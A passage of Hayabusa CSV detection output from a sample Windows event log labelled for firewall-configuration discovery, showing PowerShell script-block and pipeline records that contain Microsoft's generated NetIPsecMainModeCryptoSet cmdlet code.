$__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): 
name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): 
""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 
+00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 
@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml 
}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 